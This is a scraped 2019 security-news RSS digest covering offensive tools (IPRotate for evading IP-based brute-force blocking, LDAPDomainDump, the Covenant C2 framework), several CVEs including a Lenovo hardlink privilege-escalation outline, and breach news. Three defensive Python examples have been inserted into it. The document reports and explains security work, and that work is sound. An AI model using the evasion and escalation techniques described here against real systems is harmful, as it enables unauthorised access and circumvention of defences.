RSS Security

Yesterday, August 24th 2019: Your RSS feeds

IPRotate - Extension For Burp Suite Which Uses AWS API Gateway To Rotate Your IP On Every Request

By: Unknown

Extension for Burp Suite which uses AWS API Gateway to change your IP on every request.
More info: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/

Description
This extension allows you to easily spin up API Gateways across multiple regions. All the Burp Suite traffic for the targeted host is then routed through the API Gateway endpoints, which causes the IP to be different on each request. (There is a chance that an IP is recycled, but it is low, and the more regions you use the lower it gets.)
This is useful for bypassing different kinds of IP-based blocking, such as brute-force protection that blocks based on IP, API rate limiting based on IP, or WAF blocking based on IP.

Usage
  1. Setup Jython in Burp Suite
  2. Install the boto3 module for Python 2
    pip install boto3
  3. Ensure you have a set of AWS keys that have full access to the API Gateway service. This is available through the free tier of AWS.
  4. Insert the credentials into the fields.
  5. Insert the target domain you wish to target.
  6. Select HTTPS if the domain is hosted over HTTPS.
  7. Select all the regions you want to use. (The more you use, the larger the IP pool will be.)
  8. Click "Enable".
  9. Once you are done, click "Disable" to delete all the resources that were started.
If you want to check on the resources and endpoints that were started, or on any potential errors, look at the output console in Burp.

The Burp UI


Example of how the requests look


Setup
Make sure you have Jython installed and add IPRotate.py through the Burp Extension options.


Previous Research
After releasing this extension it was pointed out that there had been other research in this area using AWS API Gateway to hide an IP address. There is some awesome research and tooling by @ustayready, @ryHanson and @rmikehodges using this technique.
Be sure to check them out too:
https://github.com/ustayready/fireprox
https://github.com/rmikehodges/hideNsneak


Cisco released 4CAN hardware tool to find flaws in automotive computers

Cisco has released a hardware tool, called 4CAN, developed to help researchers discover vulnerabilities in automotive systems.

Computer systems in modern vehicles are very complex: they contain a huge number of devices and units that exchange a lot of data in real time.

These components communicate via the vehicle’s network, dubbed Controller Area Network (CAN). Modern cars have multiple CAN buses combined with a gateway.

These components run software that could be potentially affected by security vulnerabilities that could be exploited by threat actors for several malicious purposes, from sabotage to surveillance.

Cisco has released a new open-source hardware tool called 4CAN that aims to help the automotive industry in securing vehicles.

Researchers can use 4CAN to test on-board computers for potential security flaws; according to the company, it is very easy to use. The vehicles analyzed by Cisco's researchers have four CAN buses, all connected to the same gateway.

“A typical vehicle setup has multiple CAN buses combined with a gateway to arbitrate access between the CAN buses. This gateway acts as a firewall and can check CAN IDs to determine if the message should be allowed to traverse CAN buses. In this way, critical ECUs can be isolated from non-critical ECUs.” reads the post published by Cisco Talos.

Cisco explained that 4CAN has been designed to achieve the following goals:

  • Validating the communication policy for inter-CAN-bus communication.
  • Fuzzing (sending randomized payloads) components to identify vulnerabilities.
  • Exploring the CAN commands used to control and interact with the vehicle.
  • Simplifying the testbench setup to keep everything organized and in sync.

The 4CAN project is loosely based on the IndustrialBerry QUAD CAN BUS adapter for Raspberry CanBerry.

“Using 4CAN, the test bench setup is vastly simplified. With a single Raspberry Pi, we can simultaneously test four CAN channels, and since the 4CAN exposes the entire 40-pin GPIO header, we can remotely control the test vehicle,” Cisco continues.

The 4CAN tool is available on GitHub, licensed under a Creative Commons Attribution Share-Alike license.
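The gateway behaviour Cisco describes, a firewall that checks CAN IDs before letting a frame cross from one bus to another, can be modelled as a small policy checker that a test bench runs over captured traffic to validate the communication policy. This is an added example and is not part of 4CAN; the bus names, the policy table and the candump-style sample lines are constructed for illustration.

```python
"""Gateway CAN-ID policy checker (added example, not Cisco's 4CAN code).

A gateway sits between several CAN buses and forwards a frame only if its
CAN ID is allowed to traverse from the source bus to the destination bus.
The policy, bus names and sample frames below are constructed.
"""
import re
from dataclasses import dataclass

# Policy: (source_bus, destination_bus) -> inclusive ranges of allowed CAN IDs.
# Constructed example: the infotainment bus (can2) may reach the body bus
# (can0) with a handful of IDs only, and must never reach the powertrain
# bus (can1), so that pair is simply absent from the table.
POLICY = {
    ("can0", "can1"): [(0x100, 0x1FF)],   # body -> powertrain: status IDs only
    ("can1", "can0"): [(0x200, 0x2FF)],   # powertrain -> body
    ("can2", "can0"): [(0x300, 0x30F)],   # infotainment -> body: a few IDs
}

# candump-style line, e.g. "can2  7DF   [8]  02 01 0C 00 00 00 00 00"
_LINE = re.compile(
    r"^(\w+)\s+([0-9A-Fa-f]{3,8})\s+\[(\d+)\]\s*((?:[0-9A-Fa-f]{2}\s*)*)$"
)


@dataclass(frozen=True)
class Frame:
    bus: str
    can_id: int
    data: bytes


def parse_frame(line: str) -> Frame:
    """Parse one candump-style log line into a Frame; reject malformed input."""
    m = _LINE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable frame: {line!r}")
    bus, ident, dlc, payload = m.groups()
    data = bytes.fromhex(payload.replace(" ", ""))
    if len(data) != int(dlc):
        raise ValueError(f"DLC {dlc} does not match {len(data)} data bytes")
    return Frame(bus, int(ident, 16), data)


def allowed(frame: Frame, dst_bus: str) -> bool:
    """True if the gateway policy lets this frame cross to dst_bus."""
    if frame.bus == dst_bus:
        return True  # same bus: the gateway is not involved
    for lo, hi in POLICY.get((frame.bus, dst_bus), []):
        if lo <= frame.can_id <= hi:
            return True
    return False


def check_policy(log_lines, dst_bus):
    """Return (frame, verdict) per log line, as the gateway would decide when
    forwarding to dst_bus.  A test bench can use this to confirm a captured
    trace contains no frame that the policy should have blocked."""
    return [(f, allowed(f, dst_bus)) for f in map(parse_frame, log_lines)]


SAMPLE_LOG = [  # constructed trace
    "can0  123   [2]  01 02",
    "can2  305   [1]  FF",
    "can2  7DF   [8]  02 01 0C 00 00 00 00 00",  # OBD-II style request from infotainment
]

if __name__ == "__main__":
    for frame, ok in check_policy(SAMPLE_LOG, "can1"):
        print(f"{frame.bus} 0x{frame.can_id:03X} -> can1: {'forward' if ok else 'BLOCK'}")
```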

Pierluigi Paganini

(SecurityAffairs – 4CAN, hacking)

The post Cisco released 4CAN hardware tool to find flaws in automotive computers appeared first on Security Affairs.

Hacker will compensate victims with $1.1 million Bitcoin illegally earned

UK authorities have seized over £920,000 ($1.1 million) worth of Bitcoin from a prolific hacker, the funds will be used to compensate his victims.

Grant West, aka ‘Courvoisier,’ is a hacker who was arrested by the police in September 2017 as the result of a two-year-long investigation code-named ‘Operation Draba.’

The man was charged with multiple hacking and drug-related crimes.

In December he pleaded guilty and earlier this year, a UK court sentenced West to 10 years and eight months in prison.

West carried out phishing scams against hundreds of companies from 2015 onwards; he stole the financial data of tens of thousands of customers and then sold that information on underground cybercrime forums.

“West was responsible for attacks on more than 100 companies worldwide. He predominately used ‘phishing’ email scams to obtain the financial data of tens of thousands of customers. West would then sell this personal data in different market places on the dark web.” reads a statement from Metropolitan Police Service (MPS).

“He would then convert the profit made from selling financial details online into cryptocurrency, and store these in multiple accounts.”

When the man was arrested the Metropolitan Police Cyber Crime Unit (MPCCU) raided his home and seized an SD card containing approximately 78 million individual usernames and passwords as well as 63,000 credit and debit card details.

The police also seized around £1.6 million in cryptocurrency stored in wallets belonging to West, but the fluctuating value of Bitcoin and other digital currencies brought the seized funds down to £922,978.14.

Authorities also seized a laptop belonging to West's girlfriend that contained the personal financial information of more than 100,000 people.

West was accused of having conducted phishing scams against the websites of 17 major companies including Uber, Sainsbury's, Nectar, Groupon, T-Mobile, AO.com, Argos, the Finnish Bitcoin exchange, the British Cardiovascular Society, Truly Experiences Ltd, and M R Porter.

West was also very active in the sale of cannabis on the dark web.

Now the Southwark Crown Court judge ordered him to pay back more than $1.1 million (over £922,000) using Bitcoins and other cryptocurrencies he earned from the sale.

The funds were confiscated under the Proceeds of Crime Act; had West refused the confiscation order, he would have served a further four years in jail.

“The confiscation of the cryptocurrency, which West did not contest, follows a lengthy police investigation, codename ‘Operation Draba’, into the criminal activities of West, who was operating on the Dark Web under the moniker of ‘Courvoisier’.” continues the MPS.

“The cryptocurrency will now be sold, and the victims will receive compensation for the damage caused by the organised criminality committed by West.”

“The MPS is committed to ensuring that individuals who are committing criminality on the Dark Web are identified, prosecuted, and their criminal assets are seized.” said Detective Chief Inspector Kirsty Goldsmith, the Head of the MPCCU.

Pierluigi Paganini

(SecurityAffairs – cybercrime, Bitcoin)

The post Hacker will compensate victims with $1.1 million Bitcoin illegally earned appeared first on Security Affairs.

LDAPDomainDump - Active Directory Information Dumper Via LDAP

By: Zion3R

Active Directory information dumper via LDAP

Introduction
In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP is often not available in an easy-to-read format.
ldapdomaindump is a tool that aims to solve this problem by collecting and parsing information available via LDAP and outputting it in a human-readable HTML format, as well as machine-readable JSON and CSV/TSV/greppable files.
The tool was designed with the following goals in mind:
  • Easy overview of all users/groups/computers/policies in the domain
  • Authentication via username and password as well as via NTLM hashes (requires ldap3 >=1.3.1)
  • Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impacket's ntlmrelayx
The tool outputs several files containing an overview of objects in the domain:
  • domain_groups: List of groups in the domain
  • domain_users: List of users in the domain
  • domain_computers: List of computer accounts in the domain
  • domain_policy: Domain policy such as password requirements and lockout policy
  • domain_trusts: Incoming and outgoing domain trusts, and their properties
As well as two grouped files:
  • domain_users_by_group: Domain users per group they are member of
  • domain_computers_by_os: Domain computers sorted by Operating System

Dependencies and installation
Requires ldap3 > 2.0 and dnspython
Both can be installed with pip install ldap3 dnspython
The ldapdomaindump package can be installed with python setup.py install from the git source, or for the latest release with pip install ldapdomaindump.

Usage
There are 3 ways to use the tool:
  • With just the source, run python ldapdomaindump.py
  • After installing, by running python -m ldapdomaindump
  • After installing, by running ldapdomaindump
Help can be obtained with the -h switch:
usage: ldapdomaindump.py [-h] [-u USERNAME] [-p PASSWORD] [-at {NTLM,SIMPLE}]
                         [-o DIRECTORY] [--no-html] [--no-json] [--no-grep]
                         [--grouped-json] [-d DELIMITER] [-r] [-n DNS_SERVER]
                         [-m]
                         HOSTNAME

Domain information dumper via LDAP. Dumps users/computers/groups and
OS/membership information to HTML/JSON/greppable output.

Required options:
  HOSTNAME              Hostname/ip or ldap://host:port connection string to
                        connect to (use ldaps:// to use SSL)

Main options:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        DOMAIN\username for authentication, leave empty for
                        anonymous authentication
  -p PASSWORD, --password PASSWORD
                        Password or LM:NTLM hash, will prompt if not specified
  -at {NTLM,SIMPLE}, --authtype {NTLM,SIMPLE}
                        Authentication type (NTLM or SIMPLE, default: NTLM)

Output options:
  -o DIRECTORY, --outdir DIRECTORY
                        Directory in which the dump will be saved (default:
                        current)
  --no-html             Disable HTML output
  --no-json             Disable JSON output
  --no-grep             Disable Greppable output
  --grouped-json        Also write json files for grouped files (default:
                        disabled)
  -d DELIMITER, --delimiter DELIMITER
                        Field delimiter for greppable output (default: tab)

Misc options:
  -r, --resolve         Resolve computer hostnames (might take a while and
                        cause high traffic on large networks)
  -n DNS_SERVER, --dns-server DNS_SERVER
                        Use custom DNS resolver instead of system DNS (try a
                        domain controller IP)
  -m, --minimal         Only query minimal set of attributes to limit memmory
                        usage

Options

Authentication
Most AD servers support NTLM authentication. In the rare case that a server does not, use --authtype SIMPLE.

Output formats
By default the tool outputs all files in HTML, JSON and tab delimited output (greppable). There are also two grouped files (users_by_group and computers_by_os) for convenience. These do not have a greppable output. JSON output for grouped files is disabled by default since it creates very large files without any data that isn't present in the other files already.

DNS resolving
An important option is -r, which decides whether a computer's DNSHostName attribute should be resolved to an IPv4 address. While this can be very useful, the DNSHostName attribute is not automatically updated. When the AD domain uses subdomains for computer hostnames, the DNSHostName will often be incorrect and will not resolve. Also keep in mind that resolving every hostname in the domain might cause a high load on the domain controller.

Minimizing network and memory usage
By default ldapdomaindump will try to dump every single attribute it can read to disk in the .json files. In large networks, this uses a lot of memory (since group relationships are currently calculated in memory before being written to disk). To dump only the minimal required attributes (the ones shown by default in the .html and .grep files), use the --minimal switch.
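The grouped domain_users_by_group view and the group relationships the tool computes in memory can be reproduced from a domain_users .json dump, and the same pass over the dump gives a defender a quick audit of enabled accounts whose userAccountControl flags deserve review. This is an added example, not ldapdomaindump's own code; it assumes the .json file uses the entry layout the ldap3 library emits (a list of objects with "dn" and "attributes", every attribute value in a list), and the sample dump below is constructed.

```python
"""Users-by-group view and userAccountControl audit over a domain_users.json
dump (added example; not part of ldapdomaindump).

Assumptions (not stated on the page): the .json file is a list of LDAP
entries in the layout the ldap3 library emits, each an object with a "dn"
and an "attributes" mapping whose values are lists.  sAMAccountName,
memberOf and userAccountControl are the standard AD attribute names.
"""
import json
from collections import defaultdict

# Standard userAccountControl flag bits (ADS_UF_* constants)
UAC_ACCOUNTDISABLE = 0x0002
UAC_PASSWD_NOTREQD = 0x0020
UAC_DONT_EXPIRE_PASSWD = 0x10000

SAMPLE_DOMAIN_USERS_JSON = json.dumps([  # constructed sample dump
    {"dn": "CN=alice,CN=Users,DC=corp,DC=local",
     "attributes": {"sAMAccountName": ["alice"],
                    "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local",
                                 "CN=VPN Users,OU=Groups,DC=corp,DC=local"],
                    "userAccountControl": [512]}},          # normal, enabled
    {"dn": "CN=svc_backup,OU=Service,DC=corp,DC=local",
     "attributes": {"sAMAccountName": ["svc_backup"],
                    "memberOf": ["CN=Backup Operators,CN=Builtin,DC=corp,DC=local"],
                    "userAccountControl": [66080]}},        # 0x10220: enabled, no pw required, never expires
    {"dn": "CN=old_temp,CN=Users,DC=corp,DC=local",
     "attributes": {"sAMAccountName": ["old_temp"],
                    "memberOf": [],
                    "userAccountControl": [514]}},          # 0x202: disabled
])


def load_dump(text):
    """Parse the .json text into the list of entry objects."""
    return json.loads(text)


def _first(attrs, name, default=None):
    """ldap3 JSON stores every attribute as a list; return its first value."""
    value = attrs.get(name)
    if value in (None, []):
        return default
    return value[0] if isinstance(value, list) else value


def group_cn(dn):
    """'CN=Domain Admins,CN=Users,DC=corp,DC=local' -> 'Domain Admins'"""
    first_rdn = dn.split(",", 1)[0]
    return first_rdn.split("=", 1)[1] if "=" in first_rdn else first_rdn


def users_by_group(entries):
    """Mirror of the tool's domain_users_by_group view: group -> sorted users."""
    groups = defaultdict(set)
    for entry in entries:
        attrs = entry["attributes"]
        name = _first(attrs, "sAMAccountName")
        for group_dn in attrs.get("memberOf", []) or []:
            groups[group_cn(group_dn)].add(name)
    return {g: sorted(users) for g, users in groups.items()}


def weak_accounts(entries):
    """Enabled accounts whose UAC flags a defender should review, as
    (sAMAccountName, [flag names]) tuples; disabled accounts are skipped."""
    findings = []
    for entry in entries:
        attrs = entry["attributes"]
        uac = int(_first(attrs, "userAccountControl", 0))
        if uac & UAC_ACCOUNTDISABLE:
            continue
        flags = []
        if uac & UAC_PASSWD_NOTREQD:
            flags.append("PASSWD_NOTREQD")
        if uac & UAC_DONT_EXPIRE_PASSWD:
            flags.append("DONT_EXPIRE_PASSWD")
        if flags:
            findings.append((_first(attrs, "sAMAccountName"), flags))
    return findings


if __name__ == "__main__":
    dump = load_dump(SAMPLE_DOMAIN_USERS_JSON)
    for group, members in sorted(users_by_group(dump).items()):
        print(f"{group}: {', '.join(members)}")
    for account, flags in weak_accounts(dump):
        print(f"review {account}: {' '.join(flags)}")
```

On a real dump, replace SAMPLE_DOMAIN_USERS_JSON with the contents of domain_users.json from the output directory.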

Visualizing groups with BloodHound
LDAPDomainDump includes a utility that converts ldapdomaindump's .json files to CSV files suitable for BloodHound. The utility is called ldd2bloodhound and is added to your path upon installation. Alternatively you can run it with python -m ldapdomaindump.convert, or with python ldapdomaindump/convert.py if you are running it from the source. The conversion tool takes the users/groups/computers/trusts .json files and converts them to group_membership.csv and trust.csv, which you can add to BloodHound.


Buffer overflow exposes unpatched Squid servers to RCE and DoS attacks

Some versions of the Squid web proxy cache server built with Basic Authentication features are affected by a heap buffer overflow vulnerability.

The heap buffer overflow security flaw, tracked as CVE-2019-12527, could be exploited by attackers to trigger a DoS condition and also to execute arbitrary code on vulnerable servers.

The flaw received a high-severity CVSS v3.0 base score of 8.8; an attacker could exploit it by sending a specially crafted request to a targeted server.

The flaw affects Squid 4.0.23 through 4.7; the root cause is incorrect buffer management. When checking Basic Authentication in HttpHeader::getAuth, the proxy cache server stores the decoded data in a global buffer. The problem is that Squid does not check that the decoded length is not greater than the buffer, which triggers a heap-based buffer overflow.

“Due to incorrect buffer management Squid is vulnerable to a heap overflow and possible remote code execution attack when processing HTTP Authentication credentials.” reads the security advisory.

“This allows a malicious client to write a substantial amount of arbitrary data to the heap. Potentially gaining ability to execute arbitrary code. On systems with memory access protections this can result in the Squid process being terminated unexpectedly. Resulting in a denial of service for all clients using the proxy. This issue is limited to traffic accessing the Squid Cache Manager reports or using the FTP protocol gateway.”

Squid team pointed out that the problem is limited to the traffic accessing the Cache Manager reports or using the FTP protocol gateway.
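The missing check described above, decoded length validated against the destination buffer before any write, can be illustrated with a small Basic-Authentication parser. This is an added example and not Squid's code: BUFFER_SIZE stands in for the global buffer (the real size is not on the page) and the sample headers are constructed. The decoded length is computed from the base64 text alone, so an oversized credential is rejected before decoding.

```python
"""Bounded Basic-Authentication decoding (added example, not Squid's code).

Models the check the advisory says was missing: the base64 credential in
an Authorization header is decoded into a fixed-size buffer, so the
decoded length must be validated before anything is written.  BUFFER_SIZE
and the sample headers are constructed; the real Squid buffer size is not
on the page.
"""
import base64
import binascii
from typing import Tuple

BUFFER_SIZE = 64  # constructed size of the (global) destination buffer


class AuthError(ValueError):
    """Raised for any credential the proxy should refuse to process."""


def decoded_length(b64: bytes) -> int:
    """Exact decoded size of a padded base64 string, computed before decoding."""
    if len(b64) % 4:
        raise AuthError("base64 length not a multiple of 4")
    padding = len(b64) - len(b64.rstrip(b"="))
    return len(b64) // 4 * 3 - padding


def get_basic_auth(header_value: str, buf: bytearray) -> Tuple[str, str]:
    """Parse 'Basic <b64>' into buf and return (user, password).

    Raises AuthError instead of writing past len(buf), which is the
    condition that became a heap overflow in CVE-2019-12527."""
    scheme, _, cred = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not cred.strip():
        raise AuthError("not a Basic credential")
    try:
        raw = cred.strip().encode("ascii")
    except UnicodeEncodeError as exc:
        raise AuthError("non-ASCII byte in credential") from exc
    n = decoded_length(raw)
    if n > len(buf):
        raise AuthError(f"decoded credential ({n} bytes) exceeds buffer ({len(buf)})")
    try:
        data = base64.b64decode(raw, validate=True)
    except binascii.Error as exc:
        raise AuthError(f"bad base64: {exc}") from exc
    buf[:len(data)] = data  # bounded write: n <= len(buf) was checked above
    user, sep, password = data.decode("latin-1").partition(":")
    if not sep:
        raise AuthError("credential lacks ':' separator")
    return user, password


def check_header(header_value: str):
    """Convenience wrapper: (True, (user, password)) or (False, reason)."""
    buf = bytearray(BUFFER_SIZE)
    try:
        return True, get_basic_auth(header_value, buf)
    except AuthError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # "dXNlcjpwYXNz" is base64 of "user:pass"; the second header decodes to
    # 66 bytes and must be refused because it would not fit the buffer.
    for hdr in ("Basic dXNlcjpwYXNz", "Basic " + "YWFh" * 21 + "OmJi", "Bearer abc"):
        print(check_header(hdr))
```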

Squid development team addressed the flaw with the release of Squid 4.8 on July 9.

The security advisory recommends the following workarounds for servers that can’t be patched:

Deny ftp:// protocol URLs being proxied and Cache Manager report access to all clients:
    acl FTP proto FTP
    http_access deny FTP
    http_access deny manager

Or,

 Build Squid with --disable-auth-basic

An interesting technical analysis of the vulnerability was published by Trend Micro on the website of the Zero Day Initiative.

Pierluigi Paganini

(SecurityAffairs – proxy cache server, hacking)

The post Buffer overflow exposes unpatched Squid servers to RCE and DoS attacks appeared first on Security Affairs.

Mastercard data breach affected Priceless Specials loyalty program

Mastercard disclosed a data breach that impacted customer data from the company’s Priceless Specials loyalty program.

The American multinational financial services corporation notified the data breach to the German and Belgian Data Protection Authorities.

The data leaked online includes customers’ names, payment card numbers, email addresses, home addresses, phone numbers, gender, and dates of birth.

“The Belgian Data Protection Authority (DPA) as well as the Hessian authority of Germany have been notified by Mastercard company of a data breach detected on 19 August 2019 which would have affected a large number of data subjects, a significant portion of which would be German customers.” reads the press release published by the Belgian Data Protection Authority. “Since the main establishment of Mastercard is located in Waterloo, the Belgian DPA is working closely with its Hessian counterpart and the other competent authorities to defend the interests of the persons affected by this incident.”

Mastercard confirmed that “the incident is limited to the Specials program,” and the company added that the only payment card data leaked online were the card numbers.

“Based on the facts known at this time, the following personal information is affected: payment card number, title, name, date of birth, gender, mailing address, e-mail address and telephone number and the time of first registration with Priceless Specials. Neither access data nor passwords were published. The expiration date of payment cards and the check digit (CVC) were also not published.” states MasterCard.

In response to the data leak, Mastercard suspended the German Priceless Specials and took down its website. The website displays the following message.

“We have received a lot of questions and complaints since the announcement of this incident, we want to reassure users: we have contacted MasterCard in order to get additional information, and are following this case closely together with the Hessian data protection authority and all the other possible concerned authorities.” said David Stevens, Chairman of the Belgian Data Protection Authority.

The data breach was discovered after the loyalty program data was leaked online on August 19. MasterCard immediately took action to remove the information, but on August 21, a second file was published online.

“On August 21, 2019, we became aware that a second file of personal information was published on the Internet. We are working to remove them as well.”

According to Heise Media, the Excel spreadsheets leaked online after Mastercard's Priceless Specials loyalty program was breached contained roughly 90,000 and 84,000 rows.

Mastercard immediately launched an investigation and informed the authorities; it is also actively monitoring whether the stolen information is posted online.

“We are working closely with the relevant authorities to investigate this incident,” adds Mastercard, also stating that they are “currently reviewing our security safeguards to protect this information to identify appropriate improvements to protect against similar incidents in the future.”

Impacted customers have been notified about the data leak; Mastercard will offer them a one-year free credit monitoring and identity theft prevention service.

Pierluigi Paganini

(SecurityAffairs – MasterCard, hacking)

The post Mastercard data breach affected Priceless Specials loyalty program appeared first on Security Affairs.

Before yesterday: Your RSS feeds

Lenovo Solution Centre flaw allows hacking Windows laptop in 10 minutes

Researchers at Pen Test Partners (PTP) discovered a privilege-escalation vulnerability in Lenovo Solution Centre (LSC) tracked as CVE-2019-6177.

Security experts at Pen Test Partners (PTP) discovered a privilege-escalation vulnerability in Lenovo Solution Centre (LSC) that exists since 2011.

“A vulnerability reported in Lenovo Solution Center version 03.12.003, which is no longer supported, could allow log files to be written to non-standard locations, potentially leading to privilege escalation.” read the security advisory published by Lenovo. “Lenovo ended support for Lenovo Solution Center and recommended that customers migrate to Lenovo Vantage or Lenovo Diagnostics in April 2018.”

The vulnerability tracked as CVE-2019-6177 could be exploited by attackers to escalate privileges.

The company attempted to downplay the severity of the issue by highlighting that the product is no longer supported, even though most of the Chinese vendor's Windows laptops shipped with the flawed software.

“We found a privilege escalation vulnerability in the Lenovo Solution Centre (LSC) software, which came pre-installed on many Windows-based Lenovo devices.” states the post published by Pen Test Partners.

“The bug itself is a DACL (discretionary access control list) overwrite, which means that a high-privileged Lenovo process indiscriminately overwrites the privileges of a file that a low-privileged user is able to control. In this scenario, a low-privileged user can write a ‘hardlink‘ file to the controllable location – a pseudofile which really points to any other file on the system that the low-privileged user doesn’t have control of.”

The experts explained that the Lenovo Solution Centre adds a task at “\Lenovo\Lenovo Solution Center Launcher”, which runs with “highest privileges”.


The task created by the LSC runs the LSC.Services.UpdateStatusService.exe binary 10 minutes after a login event.

The binary executed by the scheduled task overwrites the DACL of the Lenovo product's logs folder, giving everyone in the Authenticated Users group full read/write access to them. Every logged-in user is a member of Authenticated Users, which means that everyone can access those files.

In order to exploit the flaw, an attacker has to create a hardlink file in the C:\ProgramData\Lenovo\LSC\log\ directory that points to the file whose permissions they want to overwrite.

It is quite easy for an attacker with access to the machine to run arbitrary code with administrator-level privileges.

“Then you log out, log in, and 10 minutes later, the hosts file DACL will be overwritten.” wrote the researchers.

The only way to fix the issue is to uninstall Lenovo Solution Centre; customers can install Lenovo Vantage or Lenovo Diagnostics to get the same functionality.

Pen Test Partners criticized the way Lenovo handled the report of the flaw, because Lenovo appears to have moved the EOL date back to April 2018.

“But just after their disclosure went out, we noticed they had changed the end of life date to make it look like it went end of life even before the last version was released.”

Pierluigi Paganini

(SecurityAffairs – Lenovo Solution Centre, hacking)

The post Lenovo Solution Centre flaw allows hacking Windows laptop in 10 minutes appeared first on Security Affairs.

Covenant - A .NET Command And Control Framework For Red Teamers

By: Zion3R

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.
Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.



Quick-Start Guide
Please see the Installation and Startup guide to get started with Covenant!
The Wiki documents most of Covenant's core features and how to use them.

Features
Covenant has several key features that make it useful and differentiate it from other command and control frameworks:
  • Intuitive Interface - Covenant provides an intuitive web application to easily run a collaborative red team operation.
  • Multi-Platform - Covenant targets .NET Core, which is multi-platform. This allows Covenant to run natively on Linux, MacOS, and Windows platforms. Additionally, Covenant has docker support, allowing it to run within a container on any system that has docker installed.
  • Multi-User - Covenant supports multi-user collaboration. The ability to collaborate has become crucial for effective red team operations. Many users can interact with the same Covenant server and operate independently or collaboratively.
  • API Driven - Covenant is driven by an API that enables multi-user collaboration and is easily extendible. Additionally, Covenant includes a Swagger UI that makes development and debugging easier and more convenient.
  • Listener Profiles - Covenant supports listener “profiles” that control how the network communication between Grunt implants and Covenant listeners look on the wire.
  • Encrypted Key Exchange - Covenant implements an encrypted key exchange between Grunt implants and Covenant listeners that is largely based on a similar exchange in the Empire project, in addition to optional SSL encryption. This achieves the cryptographic property of forward secrecy between Grunt implants.
  • Dynamic Compilation - Covenant uses the Roslyn API for dynamic C# compilation. Every time a new Grunt is generated or a new task is assigned, the relevant code is recompiled and obfuscated with ConfuserEx, avoiding totally static payloads. Covenant reuses much of the compilation code from the SharpGen project, which I described in much more detail in a previous post.
  • Inline C# Execution - Covenant borrows code and ideas from both the SharpGen and SharpShell projects to allow operators to execute C# one-liners on Grunt implants. This allows for similar functionality to that described in the SharpShell post, but allows the one-liners to be executed on remote implants.
  • Tracking Indicators - Covenant tracks “indicators” throughout an operation, and summarizes them in the Indicators menu. This allows an operator to conduct actions that are tracked throughout an operation and easily summarize those actions to the blue team during or at the end of an assessment for deconfliction and educational purposes. This feature is still in its infancy and still has room for improvement.
  • Developed in C# - Personally, I enjoy developing in C#, which may not be a surprise for anyone that has read my latest blogs or tools. Not everyone might agree that development in C# is ideal, but hopefully everyone agrees that it is nice to have all components of the framework written in the same language. I’ve found it very convenient to write the server, client, and implant all in the same language. This may not be a true “feature”, but hopefully it allows others to contribute to the project fairly easily.

Questions and Discussion
Have questions or want to chat more about Covenant? Join the #Covenant channel in the BloodHound Gang Slack.


Hacker Ordered to Pay Back Nearly £1 Million to Phishing Victims

A prolific hacker who carried out phishing scams against hundreds of companies worldwide has been ordered to pay back more than $1.1 million (over £922,000) worth of cryptocurrencies to his victims. Grant West, a 27-year-old resident of Kent, England, targeted several well-known companies around the world since 2015 to obtain the financial data of tens of thousands of customers and then sold

A new variant of Asruex Trojan exploits very old Office, Adobe flaws

Experts at Trend Micro discovered a new variant of the Asruex Trojan that exploits old Microsoft Office and Adobe vulnerabilities to infect systems.

Malware researchers at Trend Micro discovered a new variant of the Asruex Trojan that exploits old Microsoft Office and Adobe vulnerabilities to infect Windows and Mac systems.

Asruex first appeared in the threat landscape in 2015; researchers linked it to the spyware used by the DarkHotel APT group.

“However, when we encountered Asruex in a PDF file, we found that a variant of the malware can also act as an infector particularly through the use of old vulnerabilities CVE-2012-0158 and CVE-2010-2883, which inject code in Word and PDF files respectively.” reads the report published by Trend Micro.

CVE-2012-0158 is a critical remote code execution (RCE) vulnerability that affected Microsoft Office.

CVE-2010-2883 is a stack buffer overflow flaw that could be exploited by attackers to execute arbitrary code or trigger a denial of service condition.

The attack chain leverages a shortcut file that has a PowerShell download script, and spreads through removable drives and network drives.

The use of exploits for well-known vulnerabilities that have already been patched suggests that the attackers aim to infect specific targets who are still using older versions of Adobe Reader (versions 9.x before 9.4) and Acrobat (versions 8.x before 8.2.5) on Windows and Mac OS X.

Because of this unusual infection capability, security researchers might not consider checking files for an Asruex infection and continue to watch out for its backdoor abilities exclusively. Awareness of this new infection method could help users defend against the malware variant.

Trend Micro researchers discovered the new Asruex variant in malicious .PDF files that were spread via phishing messages.

Researchers reported that attackers also used weaponized Word files to deliver the Asruex Trojan; in other cases the malicious code is delivered as a standard executable.

“This Asruex variant compresses and encrypts the original executable file or host file and appends it as its .EBSS section. This allows the malware to drop the infector, while also executing the host file like normal.” continues the report.

Once executed on a machine, Asruex will check the following information to determine if it is running in a sandbox environment:

  • Computer names and user names
  • Exported functions by loaded modules
  • File names
  • Running processes
  • Module version of running process
  • Certain strings in disk names

If the system passes the checks, the backdoor is installed on it.

“This case is notable for its use of vulnerabilities that have been discovered (and patched) over five years ago, when we’ve been seeing this malware variant in the wild for only a year,” Trend Micro concludes. “This hints that the cybercriminals behind it had devised the variant knowing that users have not yet patched or updated to newer versions of the Adobe Acrobat and Adobe Reader software.”

Pierluigi Paganini

(SecurityAffairs – Asruex Trojan, malware)

The post A new variant of Asruex Trojan exploits very old Office, Adobe flaws appeared first on Security Affairs.

Hackers are scanning the web for vulnerable Fortinet, Pulse Secure Products installs

Hackers are exploiting recently disclosed flaws in enterprise virtual private network (VPN) products from Fortinet and Pulse Secure.

The popular cybersecurity expert Kevin Beaumont has observed threat actors attempting to exploit CVE-2018-13379 in the FortiOS SSL VPN web portal and the CVE-2019-11510 flaw in Pulse Connect Secure.

Fortigate Fortinet SSL VPN is being exploited in the wild since last night at scale using 1996 style ../../ exploit – if you use this as a security boundary, you want to patch ASAP https://t.co/IaBSqZJ9iS

— Kevin Beaumont (@GossiTheDog) August 22, 2019

The CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files.

